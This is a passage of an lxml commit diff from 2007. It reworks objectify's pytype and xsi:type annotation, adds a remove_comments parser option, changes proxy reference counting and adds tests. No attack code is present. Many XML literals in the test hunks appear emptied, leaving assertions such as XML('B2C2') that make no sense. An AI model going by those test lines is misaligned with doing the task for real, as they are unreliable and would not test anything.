+761,7 @@ return self.__nonzero__() def __checkBool(s): - if s != 'true' and s != 'false': + if s != 'true' and s != 'false' and s != '1' and s != '0': raise ValueError cdef object _strValueOf(obj): @@ -903,7 +905,7 @@ pytype.register() pytype = PyType('float', float, FloatElement) - pytype.xmlSchemaTypes = ("float", "double") + pytype.xmlSchemaTypes = ("double", "float") pytype.register() pytype = PyType('bool', __checkBool, BoolElement) @@ -1455,8 +1457,6 @@ # Type annotations cdef PyType _check_type(tree.xmlNode* c_node, PyType pytype): - # StrType does not have a typecheck but is the default anyway, - # so just accept it if given as type information if pytype is None: return None value = textOf(c_node) @@ -1468,34 +1468,114 @@ pass return None -def annotate(element_or_tree, ignore_old=True): +def annotate(element_or_tree, ignore_old=True, ignore_xsi=False, + empty_pytype=None): """Recursively annotates the elements of an XML tree with 'pytype' attributes. If the 'ignore_old' keyword argument is True (the default), current 'pytype' attributes will be ignored and replaced. Otherwise, they will be checked and only replaced if they no longer fit the current text value. + + Setting the keyword argument ``ignore_xsi`` to True makes the function + additionally ignore existing ``xsi:type`` annotations. The default is to + use them as a type hint. + + The default annotation of empty elements can be set with the + ``empty_pytype`` keyword argument. The default is not to annotate empty + elements. Pass 'str', for example, to make string values the default. """ cdef _Element element + element = cetree.rootNodeOrRaise(element_or_tree) + _annotate(element, 0, 1, bool(ignore_xsi), bool(ignore_old), + None, empty_pytype) + +def xsiannotate(element_or_tree, ignore_old=True, ignore_pytype=False, + empty_type=None): + """Recursively annotates the elements of an XML tree with 'xsi:type' + attributes. + + If the 'ignore_old' keyword argument is True (the default), current + 'xsi:type' attributes will be ignored and replaced. Otherwise, they will be + checked and only replaced if they no longer fit the current text value. + + Note that the mapping from Python types to XSI types is usually ambiguous. + Currently, only the first XSI type name in the corresponding PyType + definition will be used for annotation. Thus, you should consider naming + the widest type first if you define additional types. + + Setting the keyword argument ``ignore_pytype`` to True makes the function + additionally ignore existing ``pytype`` annotations. The default is to + use them as a type hint. + + The default annotation of empty elements can be set with the + ``empty_type`` keyword argument. The default is not to annotate empty + elements. Pass 'string', for example, to make string values the default. + """ + cdef _Element element + element = cetree.rootNodeOrRaise(element_or_tree) + _annotate(element, 1, 0, bool(ignore_old), bool(ignore_pytype), + empty_type, None) + +cdef _annotate(_Element element, int annotate_xsi, int annotate_pytype, + int ignore_xsi, int ignore_pytype, + empty_type_name, empty_pytype_name): cdef _Document doc - cdef int ignore cdef tree.xmlNode* c_node cdef tree.xmlNs* c_ns cdef python.PyObject* dict_result - cdef PyType pytype - element = cetree.rootNodeOrRaise(element_or_tree) + cdef PyType pytype, empty_pytype, StrType, NoneType + + if not annotate_xsi and not annotate_pytype: + return + doc = element._doc - ignore = bool(ignore_old) + + if empty_type_name is not None: + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, empty_type_name) + elif empty_pytype_name is not None: + dict_result = python.PyDict_GetItem(_PYTYPE_DICT, empty_pytype_name) + else: + dict_result = NULL + if dict_result is not NULL: + empty_pytype = dict_result + else: + empty_pytype = None StrType = _PYTYPE_DICT.get('str') NoneType = _PYTYPE_DICT.get('none') c_node = element._c_node tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_node, c_node, 1) if c_node.type == tree.XML_ELEMENT_NODE: + typename = None pytype = None value = None - if not ignore: - # check that old value is valid + istree = 0 + # if element is defined as xsi:nil, represent it as None + if cetree.attributeValueFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "nil") == "true": + pytype = NoneType + + if pytype is None and not ignore_xsi: + # check that old xsi type value is valid + typename = cetree.attributeValueFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") + if typename is not None: + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, typename) + if dict_result is NULL and ':' in typename: + prefix, typename = typename.split(':', 1) + dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, typename) + if dict_result is not NULL: + pytype = dict_result + if pytype is not StrType: + # StrType does not have a typecheck but is the default anyway, + # so just accept it if given as type information + pytype = _check_type(c_node, pytype) + if pytype is None: + typename = None + + if pytype is None and not ignore_pytype: + # check that old pytype value is valid old_value = cetree.attributeValueFromNsName( c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) if old_value is not None and old_value != TREE_PYTYPE: @@ -1508,43 +1588,73 @@ pytype = _check_type(c_node, pytype) if pytype is None: - # if element is defined as xsi:nil, represent it as None - if cetree.attributeValueFromNsName( - c_node, _XML_SCHEMA_INSTANCE_NS, "nil") == "true": - pytype = NoneType - - if pytype is None: - # check for XML Schema type hint - value = cetree.attributeValueFromNsName( - c_node, _XML_SCHEMA_INSTANCE_NS, "type") - - if value is not None: - dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) - if dict_result is NULL and ':' in value: - prefix, value = value.split(':', 1) - dict_result = python.PyDict_GetItem(_SCHEMA_TYPE_DICT, value) - if dict_result is not NULL: - pytype = dict_result - - if pytype is None: # try to guess type if cetree.findChildForwards(c_node, 0) is NULL: # element has no children => data class pytype = _guessPyType(textOf(c_node), StrType) + else: + istree = 1 if pytype is None: - # delete attribute if it exists - cetree.delAttributeFromNsName( - c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) - else: - # update or create attribute - c_ns = cetree.findOrBuildNodeNsPrefix( - doc, c_node, _PYTYPE_NAMESPACE, 'py') - tree.xmlSetNsProp(c_node, c_ns, _PYTYPE_ATTRIBUTE_NAME, - _cstr(pytype.name)) + # use default type for empty elements + if textOf(c_node) is None: + pytype = empty_pytype + if typename is None: + typename = empty_type_name + else: + pytype = StrType + + if pytype is not None: + if typename is None: + if not istree: + if python.PyList_GET_SIZE(pytype._schema_types) > 0: + # pytype->xsi:type is a 1:n mapping + # simply take the first + typename = pytype._schema_types[0] + elif typename not in pytype._schema_types: + typename = pytype._schema_types[0] + + if annotate_xsi: + if typename is None or istree: + cetree.delAttributeFromNsName( + c_node, _XML_SCHEMA_INSTANCE_NS, "type") + else: + # update or create attribute + c_ns = cetree.findOrBuildNodeNsPrefix( + doc, c_node, _XML_SCHEMA_NS, 'xsd') + if c_ns is not NULL: + if ':' in typename: + prefix, name = typename.split(':', 1) + if c_ns.prefix is NULL or c_ns.prefix[0] == c'\0': + typename = name + elif cstd.strcmp(_cstr(prefix), c_ns.prefix) != 0: + prefix = c_ns.prefix + typename = prefix + ':' + name + elif c_ns.prefix is not NULL or c_ns.prefix[0] != c'\0': + prefix = c_ns.prefix + typename = prefix + ':' + typename + c_ns = cetree.findOrBuildNodeNsPrefix( + doc, c_node, _XML_SCHEMA_INSTANCE_NS, 'xsi') + tree.xmlSetNsProp(c_node, c_ns, "type", _cstr(typename)) + + if annotate_pytype: + if pytype is None: + # delete attribute if it exists + cetree.delAttributeFromNsName( + c_node, _PYTYPE_NAMESPACE, _PYTYPE_ATTRIBUTE_NAME) + else: + # update or create attribute + c_ns = cetree.findOrBuildNodeNsPrefix( + doc, c_node, _PYTYPE_NAMESPACE, 'py') + tree.xmlSetNsProp(c_node, c_ns, _PYTYPE_ATTRIBUTE_NAME, + _cstr(pytype.name)) + if pytype is NoneType: + c_ns = cetree.findOrBuildNodeNsPrefix( + doc, c_node, _XML_SCHEMA_INSTANCE_NS, 'xsi') + tree.xmlSetNsProp(c_node, c_ns, "nil", "true") tree.END_FOR_EACH_ELEMENT_FROM(c_node) -def xsiannotate(element_or_tree, ignore_old=True): +def __xsiannotate(element_or_tree, ignore_old=True): """Recursively annotates the elements of an XML tree with 'xsi:type' attributes. @@ -1694,6 +1804,9 @@ objectify_parser = __DEFAULT_PARSER def setDefaultParser(new_parser = None): + set_default_parser(new_parser) + +def set_default_parser(new_parser = None): """Replace the default parser used by objectify's Element() and fromstring() functions. @@ -1735,6 +1848,42 @@ parser = objectify_parser return _parse(f, parser) +class ElementMaker(_ElementMaker): + def __init__(self, typemap=None): + if typemap is None: + typemap = {} + else: + typemap = typemap.copy() + + typemap[__builtin__.str] = __add_text + typemap[__builtin__.unicode] = __add_text + typemap[__builtin__.int] = __add_text + typemap[__builtin__.long] = __add_text + typemap[__builtin__.float] = __add_text + typemap[__builtin__.bool] = __add_text + + _ElementMaker.__init__(self, typemap, objectify_parser.makeelement) + +def __add_text(_Element elem not None, text): + cdef tree.xmlNode* c_child + if isinstance(text, bool): + text = str(text).lower() + else: + text = str(text) + c_child = cetree.findChildBackwards(elem._c_node, 0) + if c_child is not NULL: + old = cetree.tailOf(c_child) + if old is not None: + text = old + text + cetree.setTailText(c_child, text) + else: + old = cetree.textOf(elem._c_node) + if old is not None: + text = old + text + cetree.setNodeText(elem._c_node, text) + +E = ElementMaker() + cdef object _DEFAULT_NSMAP _DEFAULT_NSMAP = { "py" : PYTYPE_NAMESPACE, "xsi" : XML_SCHEMA_INSTANCE_NS, Modified: lxml/branch/html/src/lxml/parser.pxi ============================================================================== --- lxml/branch/html/src/lxml/parser.pxi (original) +++ lxml/branch/html/src/lxml/parser.pxi Fri Jun 29 19:05:43 2007 @@ -367,7 +367,7 @@ cdef ElementClassLookup _class_lookup cdef python.PyThread_type_lock _parser_lock - def __init__(self, context_class=_ResolverContext): + def __init__(self, remove_comments, context_class=_ResolverContext): cdef xmlParserCtxt* pctxt if isinstance(self, HTMLParser): self._parser_type = LXML_HTML_PARSER @@ -384,8 +384,11 @@ if pctxt is NULL: python.PyErr_NoMemory() if pctxt.sax != NULL: + if remove_comments: + pctxt.sax.comment = NULL # hard switch-off for CDATA nodes => makes them plain text pctxt.sax.cdataBlock = NULL + if not config.ENABLE_THREADING or \ self._parser_type == LXML_ITERPARSE_PARSER: # no threading @@ -690,6 +693,7 @@ * ns_clean - clean up redundant namespace declarations * recover - try hard to parse through broken XML * remove_blank_text - discard blank text nodes + * remove_comments - discard comments * compact - safe memory for short text content (default: True) * resolve_entities - replace entities by their text value (default: True) @@ -700,9 +704,9 @@ def __init__(self, attribute_defaults=False, dtd_validation=False, load_dtd=False, no_network=True, ns_clean=False, recover=False, remove_blank_text=False, compact=True, - resolve_entities=True): + resolve_entities=True, remove_comments=False): cdef int parse_options - _BaseParser.__init__(self) + _BaseParser.__init__(self, remove_comments) parse_options = _XML_DEFAULT_PARSE_OPTIONS if load_dtd: @@ -823,15 +827,16 @@ * recover - try hard to parse through broken HTML (default: True) * no_network - prevent network access (default: True) * remove_blank_text - discard empty text nodes + * remove_comments - discard comments * compact - safe memory for short text content (default: True) Note that you should avoid sharing parsers between threads for performance reasons. """ def __init__(self, recover=True, no_network=True, remove_blank_text=False, - compact=True): + compact=True, remove_comments=False): cdef int parse_options - _BaseParser.__init__(self) + _BaseParser.__init__(self, remove_comments) parse_options = _HTML_DEFAULT_PARSE_OPTIONS if remove_blank_text: Modified: lxml/branch/html/src/lxml/proxy.pxi ============================================================================== --- lxml/branch/html/src/lxml/proxy.pxi (original) +++ lxml/branch/html/src/lxml/proxy.pxi Fri Jun 29 19:05:43 2007 @@ -27,6 +27,8 @@ #print "registering for:", proxy._c_node assert c_node._private is NULL, "double registering proxy!" c_node._private = proxy + # additional INCREF to make sure _Document is GC-ed LAST! + python.Py_INCREF(proxy._doc) cdef unregisterProxy(_Element proxy): """Unregister a proxy for the node it's proxying for. @@ -35,6 +37,7 @@ c_node = proxy._c_node assert c_node._private is proxy, "Tried to unregister unknown proxy" c_node._private = NULL + python.Py_DECREF(proxy._doc) ################################################################################ # temporarily make a node the root node of its document @@ -56,6 +59,7 @@ c_new_root = tree.xmlDocCopyNode(c_node, c_doc, 2) # non recursive! tree.xmlDocSetRootElement(c_doc, c_new_root) _copyParentNamespaces(c_node, c_new_root) + _copyParentNamespaces(c_node, c_root) c_new_root.children = c_node.children c_new_root.last = c_node.last @@ -115,19 +119,21 @@ ################################################################################ # support for freeing tree elements when proxy objects are destroyed -cdef void attemptDeallocation(xmlNode* c_node): +cdef int attemptDeallocation(xmlNode* c_node): """Attempt deallocation of c_node (or higher up in tree). """ cdef xmlNode* c_top # could be we actually aren't referring to the tree at all if c_node is NULL: #print "not freeing, node is NULL" - return + return 0 c_top = getDeallocationTop(c_node) if c_top is not NULL: #print "freeing:", c_top.name _removeText(c_top.next) # tail tree.xmlFreeNode(c_top) + return 1 + return 0 cdef xmlNode* getDeallocationTop(xmlNode* c_node): """Return the top of the tree that can be deallocated, or NULL. @@ -167,30 +173,30 @@ tree.END_FOR_EACH_ELEMENT_FROM(c_node) return 1 -cdef void _deallocDocument(xmlDoc* c_doc): - """We cannot rely on Python's GC to *always* dealloc the _Document *after* - all proxies it contains => traverse the document and mark all its proxies - as dead by deleting their xmlNode* reference. - """ - cdef xmlNode* c_node - c_node = c_doc.children - tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_doc, c_node, 1) - if c_node._private is not NULL: - (<_Element>c_node._private)._c_node = NULL - tree.END_FOR_EACH_ELEMENT_FROM(c_node) - tree.xmlFreeDoc(c_doc) +## cdef void _deallocDocument(xmlDoc* c_doc): +## """We cannot rely on Python's GC to *always* dealloc the _Document *after* +## all proxies it contains => traverse the document and mark all its proxies +## as dead by deleting their xmlNode* reference. +## """ +## cdef xmlNode* c_node +## c_node = c_doc.children +## tree.BEGIN_FOR_EACH_ELEMENT_FROM(c_doc, c_node, 1) +## if c_node._private is not NULL: +## (<_Element>c_node._private)._c_node = NULL +## tree.END_FOR_EACH_ELEMENT_FROM(c_node) +## tree.xmlFreeDoc(c_doc) ################################################################################ # fix _Document references and namespaces when a node changes documents -cdef void moveNodeToDocument(_Element node, _Document doc): +cdef void moveNodeToDocument(_Document doc, xmlNode* c_element): """Fix the xmlNs pointers of a node and its subtree that were moved. Mainly copied from libxml2's xmlReconciliateNs(). Expects libxml2 doc pointers of node to be correct already, but fixes _Document references. """ + cdef _Element element cdef xmlDoc* c_doc - cdef xmlNode* c_element cdef xmlNode* c_start_node cdef xmlNode* c_node cdef xmlNs** c_ns_new_cache @@ -201,12 +207,10 @@ cdef xmlNs* c_last_del_ns cdef cstd.size_t i, c_cache_size, c_cache_last - c_element = node._c_node - c_doc = c_element.doc - if not tree._isElementOrXInclude(c_element): return + c_doc = c_element.doc c_start_node = c_element c_ns_new_cache = NULL c_ns_old_cache = NULL @@ -300,7 +304,11 @@ # fix _Document reference (may dealloc the original document!) if c_element._private is not NULL: - (<_Element>c_element._private)._doc = doc + element = <_Element>c_element._private + if element._doc is not doc: + python.Py_INCREF(doc) + python.Py_DECREF(element._doc) + element._doc = doc if c_element is c_start_node: break @@ -318,7 +326,11 @@ # fix _Document reference (may dealloc the original document!) if c_element._private is not NULL: - (<_Element>c_element._private)._doc = doc + element = <_Element>c_element._private + if element._doc is not doc: + python.Py_INCREF(doc) + python.Py_DECREF(element._doc) + element._doc = doc if c_element is c_start_node: break Modified: lxml/branch/html/src/lxml/python.pxd ============================================================================== --- lxml/branch/html/src/lxml/python.pxd (original) +++ lxml/branch/html/src/lxml/python.pxd Fri Jun 29 19:05:43 2007 @@ -9,6 +9,7 @@ cdef int PY_SSIZE_T_MAX cdef void Py_INCREF(object o) + cdef void Py_DECREF(object o) cdef FILE* PyFile_AsFile(object p) cdef int PyFile_Check(object p) Modified: lxml/branch/html/src/lxml/tests/test_elementtree.py ============================================================================== --- lxml/branch/html/src/lxml/tests/test_elementtree.py (original) +++ lxml/branch/html/src/lxml/tests/test_elementtree.py Fri Jun 29 19:05:43 2007 @@ -1161,6 +1161,26 @@ self.assertXML('', b) self.assertXML('', c) + def test_delslice_tail(self): + XML = self.etree.XML + a = XML('B2C2') + b, c = a + + del a[:] + + self.assertEquals("B2", b.tail) + self.assertEquals("C2", c.tail) + + def test_replace_slice_tail(self): + XML = self.etree.XML + a = XML('B2C2') + b, c = a + + a[:] = [] + + self.assertEquals("B2", b.tail) + self.assertEquals("C2", c.tail) + def test_delitem_tail(self): ElementTree = self.etree.ElementTree f = StringIO('B2C2') @@ -1305,6 +1325,22 @@ self.assertXML( '', a) + + def test_remove_ns(self): + Element = self.etree.Element + SubElement = self.etree.SubElement + + a = Element('{http://test}a') + b = SubElement(a, '{http://test}b') + c = SubElement(a, '{http://test}c') + + a.remove(b) + self.assertXML( + '', + a) + self.assertXML( + '', + b) def test_remove_nonexisting(self): Element = self.etree.Element Modified: lxml/branch/html/src/lxml/tests/test_etree.py ============================================================================== --- lxml/branch/html/src/lxml/tests/test_etree.py (original) +++ lxml/branch/html/src/lxml/tests/test_etree.py Fri Jun 29 19:05:43 2007 @@ -161,6 +161,18 @@ self.assertRaises(SyntaxError, parse, f) f.close() + def test_parse_remove_comments(self): + parse = self.etree.parse + tostring = self.etree.tostring + XMLParser = self.etree.XMLParser + + f = StringIO('') + parser = XMLParser(remove_comments=True) + tree = parse(f, parser) + self.assertEquals( + '', + tostring(tree)) + def test_parse_parser_type_error(self): # ET raises IOError only parse = self.etree.parse @@ -195,6 +207,30 @@ self.assertRaises(SyntaxError, parse, f) f.close() + def test_iterparse_comments(self): + # ET removes comments + iterparse = self.etree.iterparse + tostring = self.etree.tostring + + f = StringIO('') + events = list(iterparse(f)) + root = events[-1][1] + self.assertEquals(3, len(events)) + self.assertEquals( + '', + tostring(root)) + + def test_iterparse_remove_comments(self): + iterparse = self.etree.iterparse + tostring = self.etree.tostring + + f = StringIO('') + events = list(iterparse(f, remove_comments=True)) + root = events[-1][1] + self.assertEquals( + '', + tostring(root)) + def test_iterparse_broken(self): iterparse = self.etree.iterparse f = StringIO('') @@ -1387,12 +1423,33 @@ def test_sourceline_parse(self): parse = self.etree.parse - tree = parse(fileInTestDir('test_xinclude.xml')) + tree = parse(fileInTestDir('include/test_xinclude.xml')) self.assertEquals( [1, 2, 3], [ el.sourceline for el in tree.getiterator() ]) + def test_sourceline_iterparse_end(self): + iterparse = self.etree.iterparse + lines = list( + el.sourceline for (event, el) in + iterparse(fileInTestDir('include/test_xinclude.xml'))) + + self.assertEquals( + [2, 3, 1], + lines) + + def test_sourceline_iterparse_start(self): + iterparse = self.etree.iterparse + lines = list( + el.sourceline for (event, el) in + iterparse(fileInTestDir('include/test_xinclude.xml'), + events=("start",))) + + self.assertEquals( + [1, 2, 3], + lines) + def test_sourceline_element(self): Element = self.etree.Element SubElement = self.etree.SubElement @@ -1458,6 +1515,41 @@ self.assertRaises(AssertionError, Element, 'ha\0ho') + def test_unicode_byte_zero(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\0ho') + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\0ho') + + self.assertRaises(AssertionError, Element, u'ha\0ho') + + def test_byte_invalid(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", 'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "text", 'ha\x02ho') + + self.assertRaises(AssertionError, setattr, a, "tail", 'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "tail", 'ha\x02ho') + + self.assertRaises(AssertionError, Element, 'ha\x07ho') + self.assertRaises(AssertionError, Element, 'ha\x02ho') + + def test_unicode_byte_invalid(self): + Element = self.etree.Element + + a = Element('a') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "text", u'ha\x02ho') + + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\x07ho') + self.assertRaises(AssertionError, setattr, a, "tail", u'ha\x02ho') + + self.assertRaises(AssertionError, Element, u'ha\x07ho') + self.assertRaises(AssertionError, Element, u'ha\x02ho') + def test_encoding_tostring_utf16(self): # ElementTree fails to serialize this tostring = self.etree.tostring @@ -1588,12 +1680,11 @@ self.assertEquals(old_text + content + old_tail, root.text) -class ETreeXIncludeTestCase(XIncludeTestCase): - def include(self, tree): - tree.xinclude() - def test_xinclude(self): - tree = etree.parse(fileInTestDir('test_xinclude.xml')) + tree = etree.parse(fileInTestDir('include/test_xinclude.xml')) + self.assertNotEquals( + 'a', + tree.getroot()[1].tag) # process xincludes self.include( tree ) # check whether we find it replaced with included data @@ -1601,6 +1692,10 @@ 'a', tree.getroot()[1].tag) +class ETreeXIncludeTestCase(XIncludeTestCase): + def include(self, tree): + tree.xinclude() + class ElementIncludeTestCase(XIncludeTestCase): from lxml import ElementInclude Modified: lxml/branch/html/src/lxml/tests/test_htmlparser.py ============================================================================== --- lxml/branch/html/src/lxml/tests/test_htmlparser.py (original) +++ lxml/branch/html/src/lxml/tests/test_htmlparser.py Fri Jun 29 19:05:43 2007 @@ -30,7 +30,7 @@ def test_module_HTML_unicode(self): element = self.etree.HTML(self.uhtml_str) self.assertEqual(unicode(self.etree.tostring(element, 'UTF8'), 'UTF8'), - self.uhtml_str) + unicode(self.uhtml_str.encode('UTF8'), 'UTF8')) def test_module_parse_html_error(self): parser = self.etree.HTMLParser(recover=False) Modified: lxml/branch/html/src/lxml/tests/test_objectify.py ============================================================================== --- lxml/branch/html/src/lxml/tests/test_objectify.py (original) +++ lxml/branch/html/src/lxml/tests/test_objectify.py Fri Jun 29 19:05:43 2007 @@ -555,6 +555,26 @@ self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) + def test_pytype_annotation_empty(self): + XML = self.XML + root = XML(u'''\ + + + + ''') + objectify.annotate(root) + + child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) + for c in root.iterchildren() ] + self.assertEquals(None, child_types[0]) + + objectify.annotate(root, empty_pytype="str") + + child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) + for c in root.iterchildren() ] + self.assertEquals("str", child_types[0]) + def test_pytype_annotation_use_old(self): XML = self.XML root = XML(u'''\ @@ -579,19 +599,19 @@ child_types = [ c.get(objectify.PYTYPE_ATTRIBUTE) for c in root.iterchildren() ] - self.assertEquals("int", child_types[0]) - self.assertEquals("str", child_types[1]) - self.assertEquals("float", child_types[2]) - self.assertEquals("str", child_types[3]) - self.assertEquals("bool", child_types[4]) - self.assertEquals("none", child_types[5]) - self.assertEquals(None, child_types[6]) - self.assertEquals("float", child_types[7]) - self.assertEquals("float", child_types[8]) - self.assertEquals("str", child_types[9]) - self.assertEquals("str", child_types[10]) + self.assertEquals("int", child_types[ 0]) + self.assertEquals("str", child_types[ 1]) + self.assertEquals("float", child_types[ 2]) + self.assertEquals("str", child_types[ 3]) + self.assertEquals("bool", child_types[ 4]) + self.assertEquals("none", child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("float", child_types[ 7]) + self.assertEquals("float", child_types[ 8]) + self.assertEquals("str", child_types[ 9]) + self.assertEquals("str", child_types[10]) self.assertEquals("float", child_types[11]) - self.assertEquals("long", child_types[12]) + self.assertEquals("long", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) @@ -619,18 +639,18 @@ child_types = [ c.get(XML_SCHEMA_INSTANCE_TYPE_ATTR) for c in root.iterchildren() ] - self.assertEquals("xsd:int", child_types[0]) - self.assertEquals("xsd:string", child_types[1]) - self.assertEquals("xsd:float", child_types[2]) - self.assertEquals("xsd:string", child_types[3]) - self.assertEquals("xsd:boolean", child_types[4]) - self.assertEquals(None, child_types[5]) - self.assertEquals(None, child_types[6]) - self.assertEquals("xsd:int", child_types[7]) - self.assertEquals("xsd:int", child_types[8]) - self.assertEquals("xsd:int", child_types[9]) + self.assertEquals("xsd:int", child_types[ 0]) + self.assertEquals("xsd:string", child_types[ 1]) + self.assertEquals("xsd:double", child_types[ 2]) + self.assertEquals("xsd:string", child_types[ 3]) + self.assertEquals("xsd:boolean", child_types[ 4]) + self.assertEquals(None, child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("xsd:int", child_types[ 7]) + self.assertEquals("xsd:int", child_types[ 8]) + self.assertEquals("xsd:int", child_types[ 9]) self.assertEquals("xsd:string", child_types[10]) - self.assertEquals("xsd:float", child_types[11]) + self.assertEquals("xsd:double", child_types[11]) self.assertEquals("xsd:integer", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) @@ -659,18 +679,18 @@ child_types = [ c.get(XML_SCHEMA_INSTANCE_TYPE_ATTR) for c in root.iterchildren() ] - self.assertEquals("xsd:int", child_types[0]) - self.assertEquals("xsd:string", child_types[1]) - self.assertEquals("xsd:float", child_types[2]) - self.assertEquals("xsd:string", child_types[3]) - self.assertEquals("xsd:boolean", child_types[4]) - self.assertEquals(None, child_types[5]) - self.assertEquals(None, child_types[6]) - self.assertEquals("xsd:double", child_types[7]) - self.assertEquals("xsd:float", child_types[8]) - self.assertEquals("xsd:string", child_types[9]) + self.assertEquals("xsd:int", child_types[ 0]) + self.assertEquals("xsd:string", child_types[ 1]) + self.assertEquals("xsd:double", child_types[ 2]) + self.assertEquals("xsd:string", child_types[ 3]) + self.assertEquals("xsd:boolean", child_types[ 4]) + self.assertEquals(None, child_types[ 5]) + self.assertEquals(None, child_types[ 6]) + self.assertEquals("xsd:double", child_types[ 7]) + self.assertEquals("xsd:float", child_types[ 8]) + self.assertEquals("xsd:string", child_types[ 9]) self.assertEquals("xsd:string", child_types[10]) - self.assertEquals("xsd:float", child_types[11]) + self.assertEquals("xsd:double", child_types[11]) self.assertEquals("xsd:integer", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) @@ -730,7 +750,7 @@ for c in root.iterchildren() ] self.assertEquals("xsd:int", child_types[ 0]) self.assertEquals("xsd:string", child_types[ 1]) - self.assertEquals("xsd:float", child_types[ 2]) + self.assertEquals("xsd:double", child_types[ 2]) self.assertEquals("xsd:string", child_types[ 3]) self.assertEquals("xsd:boolean", child_types[ 4]) self.assertEquals(None, child_types[ 5]) @@ -739,7 +759,7 @@ self.assertEquals("xsd:int", child_types[ 8]) self.assertEquals("xsd:int", child_types[ 9]) self.assertEquals("xsd:string", child_types[10]) - self.assertEquals("xsd:float", child_types[11]) + self.assertEquals("xsd:double", child_types[11]) self.assertEquals("xsd:integer", child_types[12]) self.assertEquals("true", root.n.get(XML_SCHEMA_NIL_ATTR)) Deleted: /lxml/branch/html/src/lxml/tests/test_xinclude.xml ============================================================================== --- /lxml/branch/html/src/lxml/tests/test_xinclude.xml Fri Jun 29 19:05:43 2007 +++ (empty file) @@ -1,4 +0,0 @@ - - - - \ No newline at end of file Modified: lxml/branch/html/src/lxml/tree.pxd ============================================================================== --- lxml/branch/html/src/lxml/tree.pxd (original) +++ lxml/branch/html/src/lxml/tree.pxd Fri Jun 29 19:05:43 2007 @@ -41,6 +41,9 @@ cdef xmlCharEncoding xmlDetectCharEncoding(char* text, int len) cdef char* xmlGetCharEncodingName(xmlCharEncoding enc) +cdef extern from "libxml/chvalid.h": + cdef int xmlIsChar_ch(char c) + cdef extern from "libxml/hash.h": ctypedef struct xmlHashTable ctypedef void xmlHashScanner(void* payload, void* data, char* name) Modified: lxml/branch/html/src/lxml/xmlerror.pxi ============================================================================== --- lxml/branch/html/src/lxml/xmlerror.pxi (original) +++ lxml/branch/html/src/lxml/xmlerror.pxi Fri Jun 29 19:05:43 2007 @@ -480,7 +480,9 @@ # Constants are stored in tuples of strings, for which Pyrex generates very # efficient setup code. To parse them, iterate over the tuples and parse each -# line in each string independently. +# line in each string independently. Tuples of strings (instead of a plain +# string) are required as some C-compilers of a certain well-known OS vendor +# cannot handle strings that are a few thousand bytes in length. cdef object __ERROR_LEVELS __ERROR_LEVELS = ("""\ Modified: lxml/branch/html/src/lxml/xmlparser.pxd ============================================================================== --- lxml/branch/html/src/lxml/xmlparser.pxd (original) +++ lxml/branch/html/src/lxml/xmlparser.pxd Fri Jun 29 19:05:43 2007 @@ -23,6 +23,9 @@ char* value, int len) + ctypedef void (*commentSAXFunc)(void* ctx, + char* value) + cdef extern from "libxml/tree.h": ctypedef struct xmlParserInput ctypedef struct xmlParserInputBuffer: @@ -34,6 +37,7 @@ startElementNsSAX2Func startElementNs endElementNsSAX2Func endElementNs cdataBlockSAXFunc cdataBlock + commentSAXFunc comment cdef extern from "libxml/xmlIO.h": cdef xmlParserInputBuffer* xmlAllocParserInputBuffer(int enc) Modified: lxml/branch/html/src/lxml/xmlschema.pxi ============================================================================== --- lxml/branch/html/src/lxml/xmlschema.pxi (original) +++ lxml/branch/html/src/lxml/xmlschema.pxi Fri Jun 29 19:05:43 2007 @@ -38,12 +38,12 @@ root_node = _rootNodeOrRaise(etree) # work around for libxml2 bug if document is not XML schema at all - if _LIBXML_VERSION_INT < 20624: - c_node = root_node._c_node - c_href = _getNs(c_node) - if c_href is NULL or \ - cstd.strcmp(c_href, 'http://www.w3.org/2001/XMLSchema') != 0: - raise XMLSchemaParseError, "Document is not XML Schema" + #if _LIBXML_VERSION_INT < 20624: + c_node = root_node._c_node + c_href = _getNs(c_node) + if c_href is NULL or \ + cstd.strcmp(c_href, 'http://www.w3.org/2001/XMLSchema') != 0: + raise XMLSchemaParseError, "Document is not XML Schema" fake_c_doc = _fakeRootDoc(doc._c_doc, root_node._c_node) self._error_log.connect() @@ -61,7 +61,7 @@ if parser_ctxt is not NULL: self._c_schema = xmlschema.xmlSchemaParse(parser_ctxt) - if _LIBXML_VERSION_INT > 20624: + if _LIBXML_VERSION_INT >= 20624: xmlschema.xmlSchemaFreeParserCtxt(parser_ctxt) self._error_log.disconnect() Modified: lxml/branch/html/version.txt ============================================================================== --- lxml/branch/html/version.txt (original) +++ lxml/branch/html/version.txt Fri Jun 29 19:05:43 2007 @@ -1 +1 @@ -1.3beta +2.0dev Modified: lxml/branch/html/versioninfo.py ============================================================================== --- lxml/branch/html/versioninfo.py (original) +++ lxml/branch/html/versioninfo.py Fri Jun 29 19:05:43 2007 @@ -34,7 +34,10 @@ data = map(str.splitlines, data.split('\n\x0c\n')) del data[0][0] # get rid of the '8' dirurl = data[0][3] - localrev = max([int(d[9]) for d in data if len(d)>9 and d[9]]) + try: + localrev = 